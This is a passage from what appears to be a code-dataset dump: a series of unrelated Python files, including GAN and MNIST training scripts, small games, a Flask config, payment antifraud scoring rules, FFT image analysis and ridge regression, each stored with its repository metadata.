sum(self.history['train_D_loss'])\r\n d_loss_len = len(self.history['train_D_loss'])\r\n d_loss_mean = d_loss_sum / d_loss_len\r\n\r\n g_loss_sum = sum(self.history['train_G_loss'])\r\n g_loss_len = len(self.history['train_G_loss'])\r\n g_loss_mean = g_loss_sum / g_loss_len\r\n\r\n print('epoch: {:03d}, train_D_loss: {:.3f}, train_G_loss: {:.3f}, time: {:.3f}[sec]'\r\n .format(epoch, d_loss_mean, g_loss_mean, elapsed_time))\r\n\r\n z_test = np.random.normal(0, 1, (25, 1, 1, 100))\r\n test_images = sess.run(G_z, {z: z_test, isTrain: False})\r\n size_figure_grid = 5\r\n fig, ax = plt.subplots(size_figure_grid, size_figure_grid, figsize=(5, 5))\r\n for i, j in itertools.product(range(size_figure_grid), range(size_figure_grid)):\r\n ax[i, j].get_xaxis().set_visible(False)\r\n ax[i, j].get_yaxis().set_visible(False)\r\n\r\n for k in range(size_figure_grid*size_figure_grid):\r\n i = k // size_figure_grid\r\n j = k % size_figure_grid\r\n ax[i, j].cla()\r\n ax[i, j].imshow(np.reshape(test_images[k], (64, 64)), cmap='gray')\r\n\r\n label = 'Epoch {0}'.format(num_epoch)\r\n fig.text(0.5, 0.04, label, ha='center')\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n # z_val = np.random.normal(0, 1, (len(X_val), 1, 1, 100))\r\n # val_d_loss = sess.run(D_loss, feed_dict={x: X_val, z: z_val, isTrain: False})\r\n # val_g_loss = sess.run(G_loss, feed_dict={x: X_val, z: z_val, isTrain: 
False})\r\n            # self.history['val_D_loss'].append(val_d_loss)\r\n            # self.history['val_G_loss'].append(val_g_loss)\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n    network = DCGAN()\r\n    network.fit(num_epoch=30, batch_size=30)\r\n","sub_path":"DCGAN/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":8089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"652075964","text":"import pyxel\r\nfrom sound import *\r\nfrom gameobject import *\r\n\r\nclass Ship(GameObject):\r\n def __init__(self, x1, y1, x2, y2, image, bank_num):\r\n super().__init__(x1, y1, x2, y2, image, bank_num)\r\n\r\n # Свойства корабля\r\n self.min_speed = 0.4\r\n self.max_speed = 2\r\n self.acceleration = 0.2\r\n\r\n # Пули\r\n self.bullet_speed = 2\r\n self.bullets = []\r\n\r\n def shot(self):\r\n if len(self.bullets) <= 10: # Позволяем стрелять только 10 раз.\r\n self.bullets.append(Bullet(self, 2, 2))\r\n\r\n def bullets_fly(self):\r\n \"\"\" Данный метод занимается управлением пулями. \"\"\"\r\n for bullet in self.bullets:\r\n if bullet.y >= 0:\r\n temp_y = bullet.y\r\n bullet.delete()\r\n bullet.y = temp_y - self.bullet_speed\r\n else:\r\n self.bullets.__delitem__(self.bullets.index(bullet))\r\n bullet.delete()\r\n\r\n def draw_bullets(self):\r\n if self.bullets:\r\n for bullet in self.bullets:\r\n bullet.draw()\r\n\r\n def isCollided(self, obj): # Как же сделать столкновения? 0_o\r\n pass\r\n\r\nclass Player(Ship):\r\n def control(self): # Дописать ускорение\r\n if pyxel.btn(pyxel.KEY_LEFT) and self.x >= 0:\r\n self.x = self.x - 1\r\n if pyxel.btn(pyxel.KEY_RIGHT) and self.x <= 152:\r\n self.x = self.x + 1\r\n if pyxel.btn(pyxel.KEY_UP) and self.y >= 64:\r\n self.y = self.y - 1\r\n if pyxel.btn(pyxel.KEY_DOWN) and self.y <= 112:\r\n self.y = self.y + 1\r\n if pyxel.btnp(pyxel.KEY_SPACE):\r\n self.shot()\r\n\r\nclass Enemy(Ship):\r\n def __init__(self, App, x1, y1, x2, y2, image, bank_num):\r\n super().__init__(x1, y1, x2, y2, image, bank_num)\r\n App.enemy_ships.append(self)\r\n\r\n def shot(self):\r\n self.bullets.append(Bullet(self, 2, 2))\r\n\r\n def bullets_fly(self):\r\n \"\"\" Данный метод занимается управлением пулями. 
\"\"\"\r\n for bullet in self.bullets:\r\n if bullet.y <= 160:\r\n temp_y = bullet.y\r\n bullet.delete()\r\n bullet.y = temp_y - - self.bullet_speed\r\n else:\r\n self.bullets.__delitem__(self.bullets.index(bullet))\r\n bullet.delete()\r\n\r\nclass Bullet:\r\n def __init__(self, ship, x_shift, y_shift):\r\n self.y = ship.y + y_shift\r\n self.x = ship.x + x_shift\r\n self.draw()\r\n\r\n def delete(self):\r\n del self\r\n\r\n def draw(self):\r\n self.bullet = pyxel.rect(self.x, self.y, self.x, self.y - 1, 8)\r\n\r\nclass App:\r\n def __init__(self):\r\n pyxel.init(160, 120, fps=60, caption='Pixel Invaders')\r\n\r\n self.sound = Sound()\r\n\r\n self.debug = False\r\n self.pause = False # Че делац\r\n\r\n self.score = 0\r\n\r\n self.ship = Player(pyxel.height/ 1.5, pyxel.width / 1.5, 16, 16, \"assets/ship.png\", 1)\r\n\r\n self.enemy_ships = []\r\n\r\n e1 = Enemy(self, 0, 20, 16, 16, \"./assets/enemy1.png\", 2)\r\n e2 = Enemy(self, 20, 40, 16, 16, \"./assets/enemy1.png\", 2)\r\n e3 = Enemy(self, 40, 50, 16, 16, \"./assets/enemy1.png\", 2) \r\n\r\n pyxel.run(self.update, self.draw)\r\n\r\n def draw(self):\r\n \"\"\"\r\n Отрисовка всех игровых обьектов.\r\n \"\"\"\r\n # Background\r\n pyxel.image(0).load(0, 0, \"./assets/background_space.png\")\r\n pyxel.blt(0, 0, 0, 0, 0, 160, 160)\r\n\r\n # Статы\r\n pyxel.text(2, 2, \"Score: {score}\".format(score=self.score), 2)\r\n\r\n # Отрисовка элементов игрока\r\n self.ship.draw()\r\n self.ship.draw_bullets()\r\n\r\n # Отрисовка всех врагов и их пуль\r\n for enemy in self.enemy_ships:\r\n enemy.draw()\r\n enemy.draw_bullets()\r\n\r\n # Debug mode\r\n if self.debug:\r\n pyxel.text(2, 10, \"Mouse pos({x}, {y})\".format(x=pyxel.mouse_x, y=pyxel.mouse_y), 8)\r\n\r\n def update(self):\r\n \"\"\"\r\n Метод проверки и обработки различных событий.\r\n \"\"\"\r\n if self.pause:\r\n pass # Дописать\r\n\r\n self.ship.control() # Обработка управления кораблём\r\n self.ship.bullets_fly() # Рассчёт пуль\r\n\r\n # Рассчёт полета пуль врагов\r\n for enemy in self.enemy_ships:\r\n enemy.bullets_fly()\r\n\r\n # Вкл/выкл дебаг мода\r\n if pyxel.btn(pyxel.KEY_ALT) and pyxel.btnp(pyxel.KEY_D):\r\n if self.debug:\r\n self.debug = False\r\n else:\r\n self.debug = True\r\n\r\n # Вкл/выкл паузы\r\n elif pyxel.btnp(pyxel.KEY_P):\r\n if not self.pause:\r\n self.pause = True\r\n else:\r\n self.pause = False\r\n\r\nApp()\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"497577973","text":"import numpy as np\r\nimport torch\r\nfrom torch.autograd import Variable\r\nx_data=[1.0,2.0,3.0]\r\ny_data=[2.0,4.0,6.0]\r\nw=Variable(torch.Tensor([1.0]),requires_grad=True) # a random guess to the value\r\n\r\n# our model (the forward pass)\r\ndef forward(x):\r\n return x*w\r\n\r\n#loss function\r\ndef loss(x,y):\r\n y_pred=forward(x)\r\n return (y_pred-y)*(y_pred-y)\r\n\r\n\r\nfor epoch in range(10):\r\n for x_val,y_val in zip(x_data,y_data):\r\n l=loss(x_val,y_val)\r\n l.backward()\r\n #print(\"\\tw.grad.data\",w.grad.data)\r\n print(\"\\tgrad:\",x_val,y_val,w.grad.data[0])\r\n w.data=w.data-0.01*w.grad.data\r\n #manually zero the gradients after updating weights\r\n w.grad.data.zero_()\r\n print(\"progress:\",epoch,'loss=',l.data[0])\r\n\r\n\r\nprint(\"predict (after training)\", \"4 hours\",forward(4).data[0])\r\n","sub_path":"backprop_and_autograd.py","file_name":"backprop_and_autograd.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"244211339","text":"import os\n\nSECRET_KEY = 'the beijing telecom research center'\n# If you want to switch databases,Here are two options(sqlite or mysql)\nSQLALCHEMY_DATABASE_URI = 'sqlite:///db.sqlite'\n# SQLALCHEMY_DATABASE_URI = 'mysql+mysqlconnector://root:123456@localhost:3306/cowrest'\nSQLALCHEMY_COMMIT_ON_TEARDOWN = True\nSQLALCHEMY_TRACK_MODIFICATIONS = True\n# Mysql config POOL_SIZE and POOL_TIMEOUT\n# SQLALCHEMY_POOL_SIZE=5\n# SQLALCHEMY_POOL_TIMEOUT=10\nbase_images_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), r\"test\")\nbatch_size = 100\nmodel = None\n# classes = []\nimg_size = (299, 299)\nnoveltyDetectionLayerName = \"fc1\"\nnoveltyDetectionLayerSize = 1024\nisCenterLoss = None\nisTripletLoss = None\nmin_predict = 95.00\nmax_video_size = 20000\niv = b'1234567890123456'","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"160416051","text":"from datetime import datetime, timedelta\nfrom functools import lru_cache\n\nfrom antifraud import apis\nfrom api.models import Invoice\nfrom api import utils\nfrom flask import request\n\n\ndef score(invoice, payment):\n s = 0\n\n for rule in utils.get_scoring_rules():\n if globals().get(rule[\"id\"])(payment, invoice, **rule[\"parameters\"]):\n s += float(rule[\"score\"])\n\n return s\n\n\ndef is_trust_location(payment, invoice):\n \"\"\"Country of card != Country of payer (get from IP).\"\"\"\n ip = request.remote_addr\n if not payment.payment_account:\n return True\n bin_code = payment.payment_account[:6] # get BIN from masked card number\n if not bin_code.isnumeric():\n return\n return apis.get_country_code_by_ip(ip) != apis.get_country_code_by_bin(bin_code) is not None\n\n\ndef is_normal_amount(payment, invoice, threshold=200):\n \"\"\"Amount of payment << or >> average amount of payment for the specific merchant.\"\"\"\n last_30_days_invoices = _get_related_invoices(invoice, 30)\n last_day_invoices = _get_related_invoices(invoice, 1)\n\n amount_30 = sum(map(lambda i: i.total_price, last_30_days_invoices))\n amount_1 = sum(map(lambda i: i.total_price, last_day_invoices))\n\n return float(amount_30 / 30) * (float(threshold) / 100.0) > amount_1\n\n\ndef is_normal_count(payment, invoice, threshold=200):\n \"\"\"Increasing count of transaction for one merchant.\"\"\"\n last_30_days_invoices = _get_related_invoices(invoice, 30)\n last_day_invoices = _get_related_invoices(invoice, 1)\n\n count_30 = len(last_30_days_invoices)\n count_1 = len(last_day_invoices)\n\n return float(count_30 / 30) * (float(threshold) / 100) < count_1\n\n\n@lru_cache()\ndef _get_related_invoices(invoice, days):\n merchant_id = utils.get_store(invoice.store_id).get(\"merchant_id\")\n stores = utils.get_merchant_stores(merchant_id)\n\n invoices = []\n for store in stores:\n invoices.extend(\n Invoice.query.filter(Invoice.store_id == store[\"id\"], Invoice.created > datetime.now() - timedelta(days=days)).all()\n )\n\n return invoices\n","sub_path":"antifraud/scoring.py","file_name":"scoring.py","file_ext":"py","file_size_in_byte":2089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"42643067","text":"#######To clear the working memory###########\nfrom scipy.fftpack.basic import fft2\nfrom matplotlib.pyplot import title\ndef clearall():\n all = [var for var in globals() if var[0] != \"_\"]\n for var in all:\n del globals()[var]\n#############################################\n\nclearall()\n\n# imports necessary for this exercise \nimport re\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.fftpack import fft2, fftshift, ifft2\n\n\nSHOW_TITLE = True\nSAVE_IMAGE = True\n\n\n#--------------------------------------------------- \n# Question 1.1\n#--------------------------------------------------- \n# Function to read a pgm image from a file\ndef read_pgm(filename, byteorder='>'):\n \"\"\"Return image data from a raw PGM file as numpy array.\n\n Format specification: http://netpbm.sourceforge.net/doc/pgm.html\n\n \"\"\"\n with open(filename, 'rb') as f:\n buffer = f.read()\n try:\n header, width, height, maxval = re.search(\n b\"(^P5\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n])*\"\n b\"(\\d+)\\s(?:\\s*#.*[\\r\\n]\\s)*)\", buffer).groups()\n except AttributeError:\n raise ValueError(\"Not a raw PGM file: '%s'\" % filename)\n return np.frombuffer(buffer,\n dtype='u1' if int(maxval) < 256 else byteorder+'u2',\n count=int(width)*int(height),\n offset=len(header)\n ).reshape((int(height), int(width)))\n \n# Function used in this computer exercise to display an images \ndef display_image(image, greyColor=False, title=\"Image\", vmin=0, vmax=255, extent=None, xlabel=None, ylabel=None):\n if greyColor:\n plt.imshow(image, plt.cm.gray, vmin=vmin, vmax=vmax, extent=extent)\n else:\n plt.imshow(image, vmin=vmin, vmax=vmax, extent=extent)\n if SAVE_IMAGE:\n plt.savefig('../output/' + title.replace(' ', '_') + '.png')\n if xlabel:\n plt.xlabel(xlabel)\n if ylabel:\n plt.ylabel(ylabel)\n plt.title(title)\n plt.show()\n\n\n#--------------------------------------------------- \n# Question 1.2\n#--------------------------------------------------- \n# Computes the sum of all the pixels of the input image\ndef sum_pixels(img):\n (width, height) = img.shape\n sum = 0\n for x in xrange(width):\n for y in xrange(height):\n sum += img[x, y]\n return sum\n\n# return the list of solutions (u, v) such as ft2D(u, v) = s\ndef solve_discret_equation_FT(ft2d, s):\n res = []\n for x in xrange(len(ft2d)):\n for y in xrange(len(ft2d[0])):\n if ft2d[x, y] == s:\n res.append((x, y))\n return res\n \n\n\n#--------------------------------------------------- \n# Question 1.3\n#--------------------------------------------------- \ndef power_spectrum_2D(ft2d, fx=None, fy=None):\n epsilon = np.finfo(float).eps\n if fx != None:\n res = np.zeros(len(ft2d[0]))\n for y in xrange(len(ft2d[0])):\n val = ft2d[fx, y]\n magnitudeSquare = val.imag * val.imag + val.real * val.real\n res[y] = np.log(magnitudeSquare + epsilon)\n return res\n\n if fy != None:\n res = np.zeros(len(ft2d))\n for x in xrange(len(ft2d)):\n val = ft2d[x, fy]\n magnitudeSquare = val.imag * val.imag + val.real * val.real\n res[x] = np.log(magnitudeSquare + epsilon)\n return res\n\n res = np.zeros(ft2d.shape)\n for x in xrange(len(ft2d)):\n for y in xrange(len(ft2d[0])):\n val = ft2d[x, y]\n magnitudeSquare = val.imag * val.imag + val.real * val.real\n res[x, y] = np.log(magnitudeSquare + epsilon)\n return res\n\n \n\ndef display_plot(x, y, title=\"Plot\", xlabel=\"x\", ylabel=\"y\", limits=[], lab=None):\n plt.figure()\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n if 
isinstance(y, list):\n for i in range(len(y)):\n plt.plot(x, y[i], label=lab[i])\n else:\n plt.plot(x, y, label=lab)\n plt.grid()\n if len(limits) > 0:\n plt.axis(limits)\n if SHOW_TITLE:\n plt.title(title)\n if SAVE_IMAGE:\n plt.savefig('../output/' + title.replace(' ', '_') + '.png')\n plt.plot(0, 35)\n plt.legend()\n plt.show()\n\n#--------------------------------------------------- \n# Question 1.9 and 1.10\n#--------------------------------------------------- \ndef from_value_to_index(input_vector, input_value) : \n#Return the index position in such a way, the vecteur value at this position is the closest to the inputValue \n temp = np.abs(input_vector - input_value) \n pos = np.argmin(temp) \n \n return pos\n\n\ndef questions1_6():\n path_wheel = \"../resource/wheele.pgm\"\n\n# Question 1.1\n img = read_pgm(path_wheel)\n (width, height) = img.shape\n # display_image(img, True)\n\n# Question 1.2\n ft2d = fft2(img)\n sum = sum_pixels(img)\n freqSol = solve_discret_equation_FT(ft2d, sum)\n\n# Question 1.3\n spectrum_2D = power_spectrum_2D(ft2d)\n# display_image(\n# spectrum_2D,\n# vmin = min(spectrum_2D.flatten()),\n# vmax = max(spectrum_2D.flatten()),\n# xlabel= 'u (frequency parameter of the Fourier transform)',\n# ylabel= 'v (frequency parameter of the Fourier transform)',\n# title = 'Spectrum of the wheele picture')\n\n\n# Question 1.4\n ft2d_shifted = fftshift(ft2d)\n spectrum_shifted_2D = power_spectrum_2D(ft2d_shifted)\n img_size = img.shape[0] * img.shape[1]\n\n display_image(spectrum_shifted_2D,\n vmin=min(spectrum_shifted_2D.flatten()),\n vmax=max(spectrum_shifted_2D.flatten()),\n extent=[- height / 2 + 1, height / 2 + 1, - width / 2 + 1, width / 2 + 1],\n xlabel= 'u (frequency parameter of the Fourier transform)',\n ylabel= 'v (frequency parameter of the Fourier transform)',\n title = 'Spectrum of the wheele picture (shifted)')\n\n\n# Question 1.6\n img_computed = ifft2(ft2d)\n img_computed = img_computed.astype(int)\n# display_image(img_computed, True)\n\nif __name__ == \"__main__\":\n # I moved questions 1.1-1.6 to separate function to work on the rest of questions\n questions1_6()\n\n path_chess = \"../resource/damierHV.pgm\"\n\n# Question 1.7\n img = read_pgm(path_chess)\n (width, height) = img.shape\n# display_image(img, True)\n\n# Question 1.8\n ft2d = fft2(img)\n ft2d_shifted = fftshift(ft2d)\n spectrum_shifted_2D = power_spectrum_2D(ft2d_shifted)\n img_size = img.shape[0] * img.shape[1]\n\n# display_image(spectrum_shifted_2D,\n# vmin=min(spectrum_shifted_2D.flatten()),\n# vmax=max(spectrum_shifted_2D.flatten()),\n# extent=[- height / 2 + 1, height / 2 + 1, - width / 2 + 1, width / 2 + 1],\n# xlabel= 'u (frequency parameter of the Fourier transform)',\n# ylabel= 'v (frequency parameter of the Fourier transform)',\n# title = 'Spectrum of the chess board picture')\n\n # print(\"min = \" + str(min(spectrum_shifted_2D.flatten())) + \", max = \" + str(max(spectrum_shifted_2D.flatten())))\n\n\n# from here i don't really understand WTF is going on\n\n# Question 1.9\n spectrum_y_0 = power_spectrum_2D(ft2d_shifted, fy=0)\n spectrum_y_6 = power_spectrum_2D(ft2d_shifted, fy=6)\n display_plot(range(-len(spectrum_y_0)/2, len(spectrum_y_0)/2),\n [spectrum_y_0, spectrum_y_6],\n xlabel = 'fx',\n ylabel = 'power spectrum',\n lab = ['Power spectrum with fy=0', 'Power spectrum with fy=fy0'])\n\n # for x in range(-40, -10):\n # spectrum_x_24 = power_spectrum_2D(ft2d_shifted, fx=-26)\n # display_plot(range(len(spectrum_x_24)), spectrum_x_24, title=\"fx = -\" + str(x))\n\n # spectrum_x_25 = 
power_spectrum_2D(ft2d_shifted, fx=-27)\n # display_plot(range(len(spectrum_x_25)), spectrum_x_25, title=\"fx = -27\") \n\n# Question 1.10\n spectrum_x_0 = power_spectrum_2D(ft2d_shifted, fx=0)\n spectrum_x_15 = power_spectrum_2D(ft2d_shifted, fx=15)\n\n display_plot(range(-len(spectrum_x_0)/2, len(spectrum_x_0)/2),\n [spectrum_x_0, spectrum_x_15],\n xlabel = 'fy',\n ylabel = 'power spectrum',\n lab =['Power spectrum with fx=0', 'Power spectrum with fx=fx0'])\n\n # for y in range(-40, -10):\n # spectrum_y = power_spectrum_2D(ft2d_shifted, fy=-26)\n # display_plot(range(len(spectrum_y)), spectrum_y, title=\"fy = -\" + str(y))\n\n # fx = -24,25\n # fy = 11,12\n\n\n\n\n\n\n\n","sub_path":"ImageAndSignalProcessing/lab/4/report/code/src/Frequency_Spatial_Scale.py","file_name":"Frequency_Spatial_Scale.py","file_ext":"py","file_size_in_byte":8760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"20232234","text":"import argparse\nfrom xrd_data_parser import parse_csv, parse_xrdml\nfrom refinement_parser import parse_refinement\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('csv', nargs='*', help='path to input files')\n\n args = parser.parse_args()\n\n for f in args.csv:\n\n print(\"PARSING: \", f)\n\n extension = f.split(\".\")[-1]\n\n if extension == \"csv\":\n system = parse_csv(f)\n\n elif extension == \"xrdml\":\n system = parse_xrdml(f)\n\n elif extension == \"lst\":\n print(f)\n system = parse_refinement(f)\n","sub_path":"beamteam-data-processing/workbench.py","file_name":"workbench.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"161333607","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom markupsafe import Markup\nfrom .lang.zh_cn import Lang\n\n\ndef build_toolbar(*args):\n btn = ['refresh', 'add', 'edit', 'del']\n btns = [x for x in args if x in btn]\n btnAttr = {\n 'refresh': ['javascript:;', 'btn btn-primary btn-refresh', 'fa fa-refresh', '', Lang['refresh']],\n 'add': ['javascript:;', 'btn btn-success btn-add', 'fa fa-plus', Lang['add'], Lang['add']],\n 'edit': ['javascript:;', 'btn btn-success btn-edit btn-disabled disabled', 'fa fa-pencil', Lang['edit'], Lang['edit']],\n 'del': ['javascript:;', 'btn btn-danger btn-del btn-disabled disabled', 'fa fa-trash', Lang['delete'], Lang['delete']],\n }\n\n html = []\n for k in btns:\n href, classs, icon, text, title = btnAttr[k]\n html.append('{4}'.format(\n href, classs, title, icon, text\n ))\n\n return Markup(' '.join(html))\n","sub_path":"website/context.py","file_name":"context.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"88353792","text":"import tensorflow as tf\nfrom tensorflow.examples.tutorials.mnist import input_data\n\n# 载入数据集\nmnist = input_data.read_data_sets('MNIST_data', one_hot=True)\n\n# 每个批次的大小,一次性放入神经网络的数据数量,以矩阵的形式放入\n# 批次优化\nbatch_size = 100\n# batch_size = 100\n# 计算一共有多少个批次 //是整除的意思\nn_batch = mnist.train.num_examples // batch_size\n\n# 定义两个placehlder,None指的是可以是任意的值,根据传入的批次进行确定\nx = tf.placeholder(tf.float32, [None, 784])\ny = tf.placeholder(tf.float32, [None, 10])\nkeep_prop = tf.placeholder(tf.float32)\nlr = tf.Variable(0.001, dtype=tf.float32)\n# 增加隐藏层---优化\n# 创建一个简单的神经网络\n# W = tf.Variable(tf.zeros([784, 10]))\n# b = tf.Variable(tf.zeros([10]))\n# prediction = tf.nn.softmax(tf.matmul(x, W) + b)\n\nW1 = tf.Variable(tf.truncated_normal([784, 500], stddev=0.1))\nb1 = tf.Variable(tf.zeros([500]) + 0.1)\nl_1 = tf.nn.sigmoid(tf.matmul(x, W1) + b1)\nl1_keep = tf.nn.dropout(l_1, keep_prob=keep_prop)\n\nW2 = tf.Variable(tf.truncated_normal([500, 500], stddev=0.1))\nb2 = tf.Variable(tf.zeros([500]) + 0.1)\nl_2 = tf.nn.sigmoid(tf.matmul(l1_keep, W2) + b2)\nl2_keep = tf.nn.dropout(l_2, keep_prob=keep_prop)\n\nW3 = tf.Variable(tf.zeros([500, 10]))\nb3 = tf.Variable(tf.zeros([10]) + 0.1)\n# 输出层使用softmax函数做分类\nprediction = tf.nn.softmax(tf.matmul(l2_keep, W3) + b3)\n# 二次代价函数-----优化使用交叉熵\nloss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=prediction))\n# loss = tf.reduce_mean(tf.square(y-prediction))\n# 梯度下降法-->可以修改学习率,可以更改为其他的优化方法\n# train = tf.train.GradientDescentOptimizer(0.2).minimize(loss)\n# AdamOptimizer一般使用比较低的学习率(使用1e-6~1e-4等),但是收敛的速度比GradientDecentOptimizer快\ntrain = tf.train.AdamOptimizer(lr).minimize(loss)\n\n# 初始化变量\ninit = tf.global_variables_initializer()\n\n# equal比较两个参数是否是一样的,相同返回True,不同返回False argmax求最大的值在那个位置(比如求预测的概率最大的数字在什么位置)\n# 结果存放在一个布尔型列表中\ncorrect_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(prediction, 1))\n\n# 求准确率 cast:转换类型,布尔型转换为浮点型\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\nwith tf.Session() as sess:\n sess.run(init)\n # 迭代21个周期--->可以增加训练的轮数\n # for epoch in range(21):\n for epoch in range(100):\n # 每个周期一共训练的批次\n for batch in range(n_batch):\n sess.run(tf.assign(lr, 0.001 * (0.95 ** epoch)))\n batch_xs, batch_ys = mnist.train.next_batch(batch_size)\n sess.run(train, feed_dict={x: batch_xs, y: batch_ys, keep_prop: 1.0})\n acc = sess.run(accuracy, feed_dict={x: mnist.test.images, y: mnist.test.labels, keep_prop: 1.0})\n learning_rate = sess.run(lr)\n print('第', str(epoch + 1), '轮准确率:', acc, ' learning rate:', learning_rate)\n","sub_path":"tensorflow/test9.py","file_name":"test9.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"326389922","text":"# encoding: utf-8\n'''\n@Author: shuhan Wei\n@File: ridgeRegression.py\n@Time: 2018/8/24 11:16\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef loadDataSet(fileName):\n numFeat = len(open(fileName).readline().split('\\t')) - 1\n dataMat = []; labelMat = []\n fr = open(fileName)\n for line in fr.readlines():\n lineArr = []\n curLine = line.strip().split('\\t')\n for i in range(numFeat):\n lineArr.append(float(curLine[i]))\n dataMat.append(lineArr)\n labelMat.append(float(curLine[-1]))\n return dataMat, labelMat\n\n\n\"\"\"\n 函数说明:岭回归函数 w=(XT*X+lamI)-1 * XT*y \n Parameters:\n xMat - x数据集\n yMat - y数据集\n lam - 用户自定义参数\n Returns:\n ws - 回归系数\n\"\"\"\ndef ridgeRegres(xMat, yMat, lam=0.2):\n xTx = xMat.T * xMat\n denom = xTx + np.eye(np.shape(xMat)[1]) * lam\n if np.linalg.det(denom) == 0.0:\n print(\"The matrix is singular, cannot do inverse\")\n return\n ws = denom.I * (xMat.T * yMat)\n return ws\n\n\n\"\"\"\n 函数说明:测试岭回归\n Parameter:\n xArr - x数据集矩阵\n yArr - y数据集矩阵\n Returns:\n wMat - 回归系数矩阵,30组系数\n\"\"\"\ndef ridgeTest(xArr, yArr):\n xMat = np.mat(xArr); yMat = np.mat(yArr).T\n #对数据进行标准化处理\n yMean = np.mean(yMat, 0)\n yVar = np.var(yMat,0)\n yMat = yMat - yMean\n xMeans = np.mean(xMat,0) #行操作\n xVar = np.var(xMat, 0)\n xMat = (xMat - xMeans) / xVar\n numTestPts = 30 # 在30个不同lambda值下\n wMat = np.zeros((numTestPts, np.shape(xMat)[1])) #系数矩阵\n for i in range(numTestPts):\n ws = ridgeRegres(xMat, yMat, np.exp(i-10))\n wMat[i,:] = ws.T\n return wMat\n\n\"\"\"\n 函数说明:绘制回归系数与lambda关系曲线\n\"\"\"\ndef plotLambda(ridgeWeights):\n plt.rcParams['font.sans-serif'] = ['SimHei']\n plt.rcParams['axes.unicode_minus'] = False\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.plot(ridgeWeights)\n ax_title_text = ax.set_title(u'log(lambada)与回归系数的关系')\n ax_xlabel_text = ax.set_xlabel(u'log(lambada)')\n ax_ylabel_text = ax.set_ylabel(u'回归系数')\n plt.setp(ax_title_text, size=20, weight='bold', color='red')\n plt.setp(ax_xlabel_text, size=10, weight='bold', color='black')\n plt.setp(ax_ylabel_text, size=10, weight='bold', color='black')\n plt.show()\n\n\nif __name__ == '__main__':\n abX, abY = loadDataSet('abalone.txt')\n ridgeWeights = ridgeTest(abX, abY)\n plotLambda(ridgeWeights)\n\n","sub_path":"Regression/ridgeRegression.py","file_name":"ridgeRegression.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"381638801","text":"#input\nprint(\"Welcome sokoban game. You need to pusb B into D to win. Eat * to remove all of walls\")\n\n\nmap_sokoban = {\n\"size_x\" : 8,\n\"size_y\" : 8\n}\n\nplayer = {\n \"x\" : 7,\n \"y\" : 0\n}\nboxes = [\n {\"x\": 1, \"y\": 1 },\n {\"x\": 2, \"y\": 2 },\n {\"x\": 3, \"y\": 3 }\n ]\n\ndestinations = [\n {\"x\" : 5, \"y\" : 7},\n {\"x\" : 4, \"y\" : 1},\n {\"x\" : 6, \"y\" : 5}\n]\n\nwalls = [\n {\"x\": 3, \"y\": 5},\n {\"x\": 6, \"y\": 7},\n {\"x\": 7, \"y\": 2},\n {\"x\": 2, \"y\": 8},\n {\"x\": 4, \"y\": 6},\n {\"x\": 2, \"y\": 2},\n {\"x\": 5, \"y\": 4},\n {\"x\": 1, \"y\": 3}\n]\n\nspecial_item= {'x':2,'y':4} \n\n\n#process\n#draw Map\nplaying = True\nspc = True\nwhile playing:\n for y in range(map_sokoban[\"size_y\"]):\n for x in range(map_sokoban[\"size_x\"]):\n \n box_is_here= False\n for box in boxes:\n if box[\"x\"] == x and box[\"y\"] == y:\n box_is_here = True\n\n\n player_is_here = False\n if x == player[\"x\"] and y == player[\"y\"]:\n player_is_here = True\n\n\n des_is_here = False\n for des in destinations:\n if des[\"x\"] == x and des[\"y\"] == y:\n des_is_here = True\n\n wall_is_here = False\n for wall in walls:\n if wall[\"x\"] == x and wall[\"y\"] == y:\n wall_is_here = True\n \n item_in_here = False\n if x == special_item[\"x\"] and y == special_item[\"y\"] :\n item_in_here = True\n\n\n if player_is_here:\n print(\"P \", end = \"\")\n elif box_is_here:\n print(\"B \", end = '')\n elif des_is_here:\n print(\"D \", end = \"\")\n elif wall_is_here:\n print(\"| \", end = \"\")\n elif item_in_here:\n print(\"*\", end = \"\")\n else:\n print(\"- \", end = '') \n\n \n print()\n\n #process Game\n \n\n\n move = input(\"Your move : W A S D ? E to Exit : \").upper()\n \n dx = 0\n dy = 0\n\n if move == \"W\" : \n print(\"Up\")\n dy = -1\n \n\n elif move == \"S\":\n dy = 1\n print(\"Down\")\n \n\n elif move == 